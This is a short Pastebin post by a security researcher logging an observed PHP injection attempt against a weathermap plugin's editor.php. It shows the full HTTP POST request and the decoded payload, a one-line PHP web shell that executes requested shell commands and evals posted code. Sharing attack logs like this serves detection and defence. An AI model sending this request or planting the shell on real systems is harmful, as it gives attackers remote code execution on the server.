Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious PHP Injection attempt
- *************
- POST /plugins/weathermap/editor.php?plug=0&mapname=Netmaps.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=%3C?php%20echo(md5(a));%60$_REQUEST%5Bb%5D%60;@eval($_POST%5Bc%5D);?%3E&map_legend=Traffic+Load&map_stamp=Created:+%25b+%25d+%25Y+%25H:%25M:%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name HTTP/1.1
- User-Agent: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
- Accept: */*
- Accept-Language: zh-cn,en-us;q=0.5
- Host: www.mysite.com
- Connection: Keep-Alive
- ******
- php injection code
- encoded
- %3C?php%20echo(md5(a));%60$_REQUEST%5Bb%5D%60;@eval($_POST%5Bc%5D);?%3E
- decoded
- <?php echo(md5(a));`$_REQUEST[b]`;@eval($_POST[c]);?>
- ******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment